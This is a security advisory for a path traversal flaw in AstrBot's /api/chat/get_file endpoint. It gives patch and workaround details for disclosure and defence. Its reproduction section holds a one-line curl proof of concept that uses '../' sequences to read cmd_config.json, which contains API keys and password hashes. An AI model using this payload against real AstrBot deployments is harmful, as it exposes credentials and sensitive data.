GHSA-cq37-g2qp-3c2p
Suggest an improvement- Source
- https://github.com/advisories/GHSA-cq37-g2qp-3c2p
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-cq37-g2qp-3c2p/GHSA-cq37-g2qp-3c2p.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-cq37-g2qp-3c2p
- Aliases
- Related
- Published
- 2025-06-04T23:54:35Z
- Modified
- 2025-06-05T00:12:19.000914Z
- Severity
-
- 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVSS Calculator
- Summary
- AstrBot Has Path Traversal Vulnerability in /api/chat/get_file
- Details
-
Impact
This vulnerability may lead to:
- Information disclosure, such as API keys for LLM providers, account passwords, and other sensitive data.
Reproduce
Follow these steps to set up a test environment for reproducing the vulnerability:
Install dependencies and clone the repository:
pip install uv git clone https://github.com/AstrBotDevs/AstrBot && cd AstrBot uv run main.pyAlternatively, deploy the program via pip:
mkdir astrbot && cd astrbot uvx astrbot init uvx astrbot runIn another terminal, run the following command to exploit the vulnerability:
curl -L http://0.0.0.0:6185/api/chat/get_file?filename=../../../data/cmd_config.json
This request will read the
cmd_config.jsonconfig file, leading to the leakage of sensitive data such as LLM API keys, usernames, and password hashes (MD5).Patches
The vulnerability has been addressed in Pull Request #1676 and is included in versions >= v3.5.13. All users are strongly encouraged to upgrade to v3.5.13 or later.
Workarounds
Users can edit the cmd_config.json file to disable the dashboard feature as a temporary workaround. However, it is strongly recommended to upgrade to version v3.5.13 or later as soon as possible to fully resolve this issue.
References
- Database specific
{ "nvd_published_at": "2025-06-02T12:15:25Z", "cwe_ids": [ "CWE-23" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-06-04T23:54:35Z" }- References
-
- https://github.com/AstrBotDevs/AstrBot/security/advisories/GHSA-cq37-g2qp-3c2p
- https://nvd.nist.gov/vuln/detail/CVE-2025-48957
- https://github.com/AstrBotDevs/AstrBot/issues/1675
- https://github.com/AstrBotDevs/AstrBot/pull/1676
- https://github.com/AstrBotDevs/AstrBot/commit/cceadf222c46813c7f41115b40d371e7eb91e492
- https://github.com/AstrBotDevs/AstrBot
Affected packages
PyPI / astrbot
Package
- Name
- astrbot
- View open source insights on deps.dev
- Purl
- pkg:pypi/astrbot